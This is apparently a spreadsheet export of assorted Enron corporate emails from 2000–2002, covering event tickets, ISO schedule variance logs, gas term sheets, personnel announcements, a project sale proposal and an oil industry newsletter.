On Wednesday, I would like to offer the remaining tickets to all Managing Directors and VPs within EA, EGM and EIM.  If there are specific individuals within your area that you would like to have this information distributed to, please advise._x000D_
_x000D_
Attached, please find the Program of Events and various pictures of the hospitality area.  Complete information on the race can be found at http://www.texacogp.com. _x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
Dorie Hitchcock_x000D_
Event Manager_x000D_
Enron_x000D_
1400 Smith Street_x000D_
Suite 3640a_x000D_
Houston, TX  77002_x000D_
Telephone:  (713) 853-6978_x000D_
Fax:  (713) 646-5800_x000D_
Cell:  (713) 594-7093_x000D_
E-Mail:  dorie.hitchcock@enron.com</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 20:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/26/01; HourAhead hour: 4;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/26/01; HourAhead hour: 4;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in SC Trades schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042604.txt_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 4 / Preferred: 114.00 / Final: 113.97)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/26/01_x000D_
  TRADING_SC: PWRX_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 2_x000D_
  DEAL_NO: 1_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 10 Dec 2000 08:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>opened $9.50 by $9.60 now $9.25 by $9.35</t>
  </si>
  <si>
    <t>Fri, 7 Dec 2001 08:33:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sherry.forbish@enron.com'})</t>
  </si>
  <si>
    <t>RE: Your upcoming trip</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for your kind words.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Forbish, Sherry  _x000D_
Sent:	Friday, December 07, 2001 10:26 AM_x000D_
To:	Corman, Shelley_x000D_
Subject:	Your upcoming trip_x000D_
_x000D_
Godspeed to you and your family as you make this trip.  My younger child is adopted and it has been a wonderful blessing and experience -- he is about to celebrate his 27th birthday!  _x000D_
_x000D_
These are difficult days -- all of us may not understand everything that is taking place but we remain committed to diligently performing our jobs.  Have a safe trip! </t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 11:42:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'moseley_l@piedmont.tec.sc.us'})</t>
  </si>
  <si>
    <t>Liz Moseley_x000D_
Greenwood, SC_x000D_
moseley_l@piedmont.tec.sc.us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On a personal note, my mother, who is a 61-year-old widowed public schoolteacher, has lost more than $50,000 of her net worth left to her in Enron stock at her father's and husband's deaths. I realize that $50,000 is a mere pittance to those in your position, but I can assure you that the comfort and security of my mother's remaining years will be markedly diminished by a loss of this magnitude, one that few women in her position could absorb._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Liz Moseley_x000D_
_x000D_
Liz Moseley</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 15:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">My details to Rick and Sharron..._x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 10/18/2000 10:39 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sally Beck                           10/18/2000 10:31 PM_x000D_
	_x000D_
_x000D_
To: Richard Causey/Corp/Enron@ENRON_x000D_
cc: Sharron Westbrook/Corp/Enron@ENRON _x000D_
Subject: Speaking Engagement - October 23, 2000_x000D_
_x000D_
Thanks in advance for agreeing to speak at the Global Operations Controller _x000D_
Forum.  I know that we are catching you before a tee time on Monday, so I _x000D_
especially appreciate your joining us to kick off the event that morning.  _x000D_
Dress for the forum is casual, so feel free to do the same.  There will be _x000D_
approximately 30 Enron business controllers present at the meeting.  All have _x000D_
responsibility for mid and back office operations for the following Enron _x000D_
entities:  Enron North America, Enron Europe, Enron South America, Enron _x000D_
Global Markets, Enron Industrial Markets, Enron Broadband Services and Enron _x000D_
Energy Services.  Attendees will be here from Houston, Calgary, Tokyo, _x000D_
Sydney, London and New York (metals business).   _x000D_
_x000D_
Attached for your reference is the agenda. There may be some slight changes _x000D_
before the forum begins, but this will give you a good idea of the topics to _x000D_
be covered and the other speakers who will address the group.  _x000D_
_x000D_
_x000D_
You are scheduled to address the group as follows:_x000D_
_x000D_
Date:  Monday, October 23, 2000_x000D_
Time:  8:00 am_x000D_
  (breakfast will be served at 7:30 and you are invited to join us)_x000D_
Place:  The Warwick Hotel_x000D_
  The Versailles Room - 12th Floor _x000D_
  5701 Main Street_x000D_
  Houston,  TX  77005_x000D_
_x000D_
With a small group, your talk can be informal and you do not need to prepare _x000D_
slides (unless you would like to do so).  Q&amp;A afterwards would be great.  Key _x000D_
speaking points that would enforce the value of this conference for this _x000D_
group would be:_x000D_
_x000D_
recognition of a job well done in supporting explosive business growth in _x000D_
2000 _x000D_
your support for global standards for operational controls for trading _x000D_
activities_x000D_
your recognition of the value of operational professionals in the _x000D_
organization to ensure integrity of mid and back office functions  _x000D_
your challenge to the group to strive for best in class processes and _x000D_
controls as Enron's growth as a trading organization continues_x000D_
_x000D_
Let me know if you have any questions and thanks again for joining us.  _x000D_
_x000D_
        _x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 06:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eklinkner@ci.pasadena.ca.us'})</t>
  </si>
  <si>
    <t>frozenset({'sendo@ci.pasadena.ca.us', 'kim.ward@enron.com'})</t>
  </si>
  <si>
    <t>RE: April through August term sheet update</t>
  </si>
  <si>
    <t>Term sheet looks fine._x000D_
As for gas pricing, it seems we'd be better off just settling per the_x000D_
contract._x000D_
I'm OK with PG&amp;E Topock, but I'm hopeful that either (i) it will prove to be_x000D_
more valuable (closer to So Cal) in the future, or (ii) we can work with_x000D_
PG&amp;E to deliver it to So Cal somehow._x000D_
_x000D_
-ek_x000D_
_x000D_
Eric R. Klinkner_x000D_
Director of Power Supply_x000D_
Pasadena Water and Power Department_x000D_
626-744-4478 Voice_x000D_
626-744-6432 Fax_x000D_
eklinkner@ci.pasadena.ca.us_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kim.Ward@enron.com [mailto:Kim.Ward@enron.com]_x000D_
Sent: Tuesday, March 27, 2001 1:16 PM_x000D_
To: eklinkner@ci.pasadena.ca.us; sendo@ci.pasadena.ca.us_x000D_
Subject: April through August term sheet update_x000D_
_x000D_
_x000D_
Guys,_x000D_
_x000D_
Attached is the latest and greatest term sheet for April through August,_x000D_
2001.  Please let me know if I have addressed all of the issues we_x000D_
discussed.  If not, just let me know and I can fix it._x000D_
_x000D_
Also, for your KRS supply for April 1 -10, we are a Gas Daily minus $.50_x000D_
bid.  For the 3500 fixed priced gas at the Border, we will pay Gas Daily_x000D_
minus $.10.  Also, for the EPNG capacity delivered to PG&amp;E Topock, our_x000D_
fixed price bid is $2.10 plus variable._x000D_
_x000D_
Let me know what you think about these prices so I can get them in the_x000D_
system if we agree.  Also, call me if you have any questions!_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kim_x000D_
_x000D_
(See attached file: erics_april_2001_term_sheet.doc)</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 02:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ben.jacoby@enron.com', 'david.parquet@enron.com'})</t>
  </si>
  <si>
    <t>Gas turbine availability</t>
  </si>
  <si>
    <t xml:space="preserve">Guys, FYI - Ben, can you follow up with this person with our interest or lack _x000D_
thereof whichever is applicable._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 12/05/2000 _x000D_
10:54 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sherri Sera @ ENRON                           12/04/2000 12:08 PM_x000D_
	_x000D_
_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: Kay Chapman/HOU/ECT@ECT _x000D_
Subject: Gas turbine availability_x000D_
_x000D_
David, I believe this should have been addressed to you.  Please advise if it _x000D_
should be forwarded elsewhere.  Thanks, SRS_x000D_
---------------------- Forwarded by Sherri Sera/Corp/Enron on 12/04/2000 _x000D_
11:55 AM ---------------------------_x000D_
_x000D_
_x000D_
JMisteli@aol.com on 12/04/2000 10:23:06 AM_x000D_
To: jeff.skilling@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Gas turbine availability_x000D_
_x000D_
_x000D_
????????????????????????????????????????????????????????????????????????????_x000D_
?????????????12/4/00 _x000D_
Dear Mr Skilling, _x000D_
Attached is a letter concerning gas turbine power plants which could be _x000D_
operational next summer. _x000D_
Sincerely, _x000D_
John A. Misteli_x000D_
 - GT Lttr HC4-2A E Mail.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Analyst / Associate Program Leadership Changes</t>
  </si>
  <si>
    <t>I would like to announce the following management changes within the Analyst _x000D_
/ Associate Program, which are effective immediately._x000D_
_x000D_
Traci Warner will assume responsibility for Recruiting for the Western _x000D_
Hemisphere.  Traci joined Enron's Associate Program in 1995 and has held _x000D_
positions in Business Development, Origination, and Public Relations at Enron _x000D_
Energy Services, Enron North America and Enron Broadband Services._x000D_
_x000D_
Ted Bland will assume responsibility for Career Development (including _x000D_
rotations) for the Western Hemisphere.  Ted has been with Enron since 1989 _x000D_
and has held several roles in Origination and Business Development within _x000D_
Enron Wholesale Services.  Most recently, Ted was assigned to the _x000D_
commercialization of some activities within Human Resources._x000D_
_x000D_
Anna Jansson, who is based in London, will continue to lead all efforts for _x000D_
the Associate / Analyst Program in the Eastern Hemisphere.  Anna has been _x000D_
with Enron Europe for the past three years and, most recently, has been _x000D_
responsible for setting up the EBS Human Resources function in Europe._x000D_
_x000D_
Please join me in working with Traci, Ted and Anna to ensure the success of _x000D_
this important program._x000D_
_x000D_
Billy Lemmons_x000D_
Vice President, Analyst / Associate Program</t>
  </si>
  <si>
    <t>Thu, 15 Jun 2000 02:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Outercurve Technologies - Request for EOL NDA</t>
  </si>
  <si>
    <t>Tana,_x000D_
_x000D_
Please can you forward a copy of the EOL NDA to Alexandria Khalil at _x000D_
Outercurve Technologies (akhalil@outercurve.com).  Please can you advise when _x000D_
you have received a signed copy._x000D_
_x000D_
Thanks_x000D_
_x000D_
-Teresa</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 09:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Kay:_x000D_
_x000D_
As we discussed, I have been working with a counterparty interested in _x000D_
purchasing one or both of ENA's Illinois development project LLC's.  The _x000D_
counterparty is listed below:_x000D_
  PSEG Americas Development Company, L.L.C._x000D_
  35 Waterview Blvd._x000D_
  Parsippany, NJ  94105_x000D_
_x000D_
The key points of the proposed transaction are:_x000D_
_x000D_
1.  The transaction would be an outright purchase of 100% of the member _x000D_
interests in one or both of the following project entities:_x000D_
_x000D_
 Kendall New Century Development, L.L.C._x000D_
 Titan Land Development Company, L.L.C._x000D_
_x000D_
2.  The purchase price of 100% of the member interests would be:_x000D_
_x000D_
 Kendall New Century Development, L.L.C.: $3,000,000.00_x000D_
 Titan Land Development Company, L.L.C.: $6,000,000.00_x000D_
_x000D_
Lisa Mellancamp was the ENA attorney who handled the CA between ENA and PSEG _x000D_
before Christmas.  At the end of November, Lisa engaged Corey Brown at _x000D_
Bracewell &amp; Patterson to handle the preparation of a draft Securities _x000D_
Purchase Agreement in conjunction with our discussions with Coastal Power.  _x000D_
Corey prepared a draft SPA based upon an option to purchase structure, but _x000D_
Coastal Power backed away from the transaction in early December._x000D_
_x000D_
I have received a letter from PSEG Power LLC indicating their interest in _x000D_
proceeding with a transaction in the near future.  I will forward you a copy _x000D_
of this letter for your records.  They have verbally indicated that the _x000D_
Purchase Price(s) of $3 MM and $6 MM respectively, are acceptable to them._x000D_
_x000D_
I believe that this is the appropriate time to bring you into the process and _x000D_
transfer things from Lisa to yourself.  Please call me to discuss the SPA _x000D_
once you have reviewed the appropriate documents.  I will be in Chicago _x000D_
tomorrow.  I can be reached by cell at (713) 412-4612 or leave me a _x000D_
voicemail.  I will be in the Houston office by noon on Friday._x000D_
_x000D_
Thanks,_x000D_
Fred</t>
  </si>
  <si>
    <t>Fri, 14 Sep 2001 11:23:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.collins@enron.com'})</t>
  </si>
  <si>
    <t>FW: An Article from the globeandmail.com Web Centre</t>
  </si>
  <si>
    <t>And one more on the Canadian perspective..._x000D_
_x000D_
-----Original Message-----_x000D_
From: Johnson, Tamara _x000D_
Sent: Thursday, September 13, 2001 9:32 AM_x000D_
To: Collins, Joan_x000D_
Subject: An Article from the globeandmail.com Web Centre_x000D_
_x000D_
_x000D_
The following is an article from the globeandmail.com Web Centre._x000D_
_x000D_
I would say that this article is more representative of what Canadians are thinking..</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 11:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/25/01; HourAhead hour: 19;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/25/01; HourAhead hour: 19;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in SC Trades schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042519.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/25/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_SCOUT_x000D_
  ENGY_TYPE: FIRM_x000D_
_x000D_
_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 19 / Preferred: -250.00 / Final: -200.00)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/25/01_x000D_
  TRADING_SC: ECH1_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 1_x000D_
  DEAL_NO: 1_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Sep 2001 08:15:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ellen.wallumrod@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'theresa.staab@enron.com', 'gerald.nemec@enron.com', 'debra.perlingiere@enron.com', 'stacey.richardson@enron.com'})</t>
  </si>
  <si>
    <t>Updated: Denver office deals - Confirmation Procedure</t>
  </si>
  <si>
    <t>When: Thursday, September 06, 2001 2:00 PM-3:00 PM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where: EB38 - we'll find a confrence room - let's meet in Gerald's office_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
_x000D_
Due to a conflict, we will move the meeting to 2pm - hope everybody can make it.</t>
  </si>
  <si>
    <t>Wed, 20 Feb 2002 15:56:21 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
	Thursday_x000D_
February 21, 2002	 &lt;http://oad.realmedia.com/RealMedia/ads/click_nx.ads/UMUK_Rigzone.WeeklyNewsletter/THURAYA01_RIGWNMW02/102150216415210&gt;		_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	 RIGZONE &lt;http://www.rigzone.com/images/email/top_Rigzone.jpg&gt;	  &lt;http://www.rigzone.com/images/email/top_Curve.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/email/top_DailyNews.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	home &lt;http://www.rigzone.com/default.asp&gt; | news &lt;http://www.rigzone.com/news/&gt; | search &lt;http://www.rigzone.com/search/&gt; | maps &lt;http://www.rigzone.com/maps/&gt; | data &lt;http://www.rigzone.com/data/&gt; | jobs &lt;http://www.rigzone.com/jobs/&gt; | market &lt;http://www.rigzone.com/market/&gt; | store!  &lt;http://www.rigzone.com/store/&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	In Th! is Issue	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Current Oil and Gas Industry News_x000D_
Top Stories for the Past 7 Days_x000D_
Featured Events and Conferences_x000D_
What's in Store - Books &amp; More_x000D_
_x000D_
Featured Employment Opportunities_x000D_
Surplus Oilfie! ld Equipment For Sale_x000D_
Worldwide Offshore Rig Utilization_x000D_
Oil &amp; Gas Prices_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Industry Headlines	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Russia Not Ready to Make Decision on Further Cuts &lt;http://www.rigzone.com/news/article.asp?a_id=2673&gt;_x000D_
Russian oil company executives have met with Russian Prime Minister Mikhail Kasyanov to discuss Russia's oil problems, but the possibility of extending the cut on oil exports into the second quarter of 2002 did not arise._x000D_
_x000D_
GlobalSantaFe's Worldwide SCORE Remains Flat  &lt;http://www.rigzone.com/news/article.asp?a_id=2669&gt;_x000D_
GlobalSantaFe reported that the company's worldwide SCORE, or Summary of Current Offshore Rig Economics, for January 2002 was down from the previous month's SCORE by 0.2 percent._x000D_
_x000D_
Offshore Liftboat Sinks in the Gulf of Mexico &lt;http://www.rigzone.com/news/article.asp?a_id=2664&gt;_x000D_
Nineteen rig workers wer! e rescued from the choppy waters off the Alabama coast as the wreckage of the liftboat floated nearby._x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
_x000D_
advertisement	_x000D_
Welcome to the world of Thuraya, where communication knows no boundaries. Thuraya provides mobile satellite telephony to 99 countries throughout Europe, North and Central Africa, the Middle East, Central Asia and the Indian Sub-continent. With a combination of cellular and satellite phone capabilities bolstered by GPS and data features, Thuraya provides the total communications solution you've been looking for.Click for more... &lt;http://www.rigzone.com/news/article.asp?a_id=2512&gt;	_x000D_
_x000D_
	_x000D_
_x000D_
Exploration	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
BP Renames Gulf of Mexico Discovery &lt;http://www.rigzone.com/news/article.asp?a_id=2674&gt;_x000D_
BP announced it has retired the name Crazy Horse, and has re-named its major Gulf of Mexico discovery Thunder Horse._x000D_
_x000D_
BG Awarded Licenses Offshore Spain &lt;http://www.rigzone.com/news/article.asp?a_id=2672&gt;_x000D_
BG Group's application for seven offshore exploration licenses in Spain has received Cabinet approval from the Spanish Government._x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Production	!   &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Shell's Sunrise Facility Approved &lt;http://www.rigzone.com/news/article.asp?a_id=2670&gt;_x000D_
Woodside Petroleum has approved the controversial proposal by Shell to develop the Timor Sea gas resources via the world's first floating liquefied natural gas facility._x000D_
_x000D_
BHP To Invest in GOM Pipeline System &lt;http://www.rigzone.com/news/article.asp?a_!&gt;_x000D_
BHP Billiton will take equity ownership in two limited liability companies that will transport hydrocarbons from Mad Dog Atlantis in the ultra-deepwater Gulf of Mexico._x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Company &amp; Financial News	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
2001 Safer Year for Statoil &lt;http://www.rigzone.com/news/article.asp?a_id=2671&gt;_x000D_
Statoil's health, safety and environment (HSE) results for 2001 show a marked decline in the number of injuries._x000D_
_x000D_
FMC Energy Inks Deal with Norsk Hydro &lt;http://www.rigzone.com/news/article.asp?a_id=2668&gt;_x000D_
FMC Energy Systems business has signed a total vendor management frame agreement with Norsk Hydro through 2009._x000D_
_x000D_
BJ Services Acquires OSCA, Inc. &lt;http://www.rigzone.com/news/article.asp?a_id=2667&gt;_x000D_
BJ Services Company has signed a definitive merger agreement to acquire OSCA, Inc. for $28.00 per share! ._x000D_
_x000D_
National Oilwell Elects New Board Member &lt;http://www.rigzone.com/news/article.asp?a_id=2665&gt;_x000D_
National-Oilwell, Inc. announced that Roger L. Jarvis, chairman, president and chief executive officer of Spinnaker Exploration Company, has been appointed to National Oilwell's board of directors._x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Last 7 Days Top Stories	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/im!&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Russian Environmentalists Seeking Sakhalin Drilling Ban &lt;http://www.rigzone.com/news/article.asp?a_id=2639&gt;_x000D_
A Moscow court will hear a lawsuit in April filed by Russian environmental groups seeking to ban oil and gas projects off Sakhalin island in the Russian Far East._x000D_
_x000D_
Hydralift Acquires AmClyde &lt;http://www.rigzone.com/news/article.asp?a_id=2654&gt;_x000D_
Hydralift ASA has entered into a contract to acquire substantially all of the assets and activities of AmClyde Engineered Products Company, Inc. from the bankrupt! cy estate of Friede Goldman Halter, Inc._x000D_
_x000D_
Ottawa Could Open Coast to Offshore Drilling &lt;http://www.rigzone.com/news/article.asp?a_id=2624&gt;_x000D_
Ottawa officials said they are prepared to consider a proposal to remove the long-standing moratorium on offshore oil and gas drilling in British Columbia._x000D_
_x000D_
El Paso Pulls The Trigger on Major GOM Pipeline &lt;http://www.rigzone.com/news/article.asp?a_id=2618&gt;_x000D_
El Paso Energy Partners, L.P. will build and operate the Cameron Highway Oil Pipeline System, a major new 380-mile oil pipeline in the Gulf of Mexico._x000D_
_x000D_
PanCanadian Drills Another Duster &lt;http://www.rigzone.com/news/article.asp?a_id=2623&gt;_x000D_
PanCanadian drills its third duster offshore eastern Canada._x000D_
_x000D_
Tesco Awarded Algerian Drilling Contract &lt;http://www.rigzone.com/news/article.asp?a_id=2645&gt;_x000D_
The Company has entered into an agreement with Steppe Forage, a major Algerian water well drilling contractor, to Ca! sing Drill(TM) six water wells in western Algeria._x000D_
_x000D_
BP Announces GOM Pipeline Construction Plans &lt;http://www.rigzone.com/news/article.asp?a_id=2653&gt;_x000D_
BP announced plans for the construction of three large-diameter crude oil pipelines to transport oil from the company's major discoveries in the deepwater Gulf of Mexico._x000D_
_x000D_
Brunei Creates New State-Owned Oil Company &lt;http://www.rigzone.com/news/article.asp?a_id=2634&gt;_x000D_
Brunei is set to play a bigger role in the global oil and gas scene under the newly established state-owned PetroleumBRUNEI._x000D_
_x000D_
Amerada Hess Resumes Production at Ceiba &lt;http://www.rigzone.com/news/article.asp?a_id=2616&gt;_x000D_
Amerada Hess Corporation announced that the Ceiba Field offshore Equatorial Guinea resumed oil production in late January and is now flowing at rates in excess of 50,000 barrels of oil per day._x000D_
_x000D_
Amerada Hess To Reduce UK Workforc! e &lt;http://www.rigzone.com/news/article.asp?a_id=2635&gt;_x000D_
Amerada Hess will reduce its exploration and production staff based in the UK by approximately 15 precent._x000D_
_x000D_
Offshore Nigerian Field Confirmed &lt;http://www.rigzone.com/news/article.asp?a_id=2640&gt;_x000D_
Three appraisal wells have confirmed the potential of a previously unknown offshore oil field in Nigeria._x000D_
_x000D_
Prosafe acquires the Polyconcord &lt;http://www.rigzone.com/news/article.asp?a_id=2633&gt;_x000D_
Prosafe ASA has entered into an agreement with K/S Rasmussen Offshore A/S for the purchase of the semisubmersible accommodation and service rig Polyconcord._x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Upcoming Oil &amp; Gas Industry Events	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Feb. 26	2002 IADC/SPE Drilling Conference and Exhibition &lt;http://www.rigzone.com/news/event_detail.asp?event_id=37&gt;	Dallas	_x000D_
Feb. 26	Offshore Oil and Gas Safety Seminars &lt;http://www.rigzone.com/news/event_detail.asp?event_id=214&gt;	Aberdeen	_x000D_
Feb. 27	Human Resources in Oil &amp; Gas &lt;http://www.rigzone.com/news/event_detail.asp?event_id=194&gt;	Aberdeen	_x000D_
Mar. 10	AAPG Annual Meeting &lt;http://www.rigzone.com/news/event_detail.asp?event_id=21&gt;	Houston	_x000D_
Mar. 17	Oil Field Chemistry Symposium - 13th International &lt;http://www.rigzone.com/news/event_detail.asp?event_id=224&gt;	Geilo	_x000D_
Mar. 20	LNG North America &lt;http://www.rigzone.com/news/event_detail.asp?event_id=201&gt;	Houston	_x000D_
Apr. 2	e-Business in the E&amp;P Industry - Targeting the Value &lt;http://www.rigzone.com/news/event_detail.asp?event_id=228&gt;	Houston	_x000D_
Apr. 7	CORROSION/2002 &lt;http://www.rigzone.com/news/event_detail.asp?event_id=254&gt;	Denver	_x000D_
Apr. 9	2002 SPE/ICoTA ! Coiled Tubing Conference and Exhibition &lt;http://www.rigzone.com/news/event_detail.asp?event_id=41&gt;	Houston	_x000D_
May. 6	Offshore Technology Conference 2002 &lt;http://www.rigzone.com/news/event_detail.asp?event_id=31&gt;	Houston	_x000D_
list your conference &lt;http://www.rigzone.com/news/post_event.asp?action=INSERT&gt;	view upcoming events &lt;http://www.rigzone.com/news/event_home.asp&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/email/title_tab_SponsoredBy.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	Click here to go to Baker Hughes &lt;http://www.bakerhughes.com/&gt;_x000D_
AADE &lt;http://www.aadehouston.net/&gt;_x000D_
Global Completion Service &lt;http://www.globalcompletion.com&gt;_x000D_
HoverDril &lt;http://www.hoverdril.com&gt;_x000D_
Ocean International &lt;http://www.oceanint.com&gt;_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
promote your company &lt;http://www.rigzone.com/advertise/&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/email/title_tab_InStore.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	 &lt;http://www.rigzone.com/store/product.asp?p_id=420&gt;_x000D_
Liferaft Operation and Survival Practices &lt;http://www.rigzone.com/store/product.asp?p_id=420&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
 &lt;http://www.rigzone.com/store/product.asp?p_id=339&gt;_x000D_
Rotary Rig Safety Inspection Checklist &lt;http://www.rigzone.com/store/product.asp?p_id=339&gt;	_x000D_
	_x000D_
 &lt;http://www.rigzone.com/store/product.asp?p_id=275&gt;_x000D_
Shipboard Operations &lt;http://www.rigzone.com/store/product.asp?p_id=275&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
more products &lt;http://www.rigzone.com/store/&gt;	_x000D_
_x000D_
 &lt;http://www.iotcnet.org/&gt;_x000D_
_x000D_
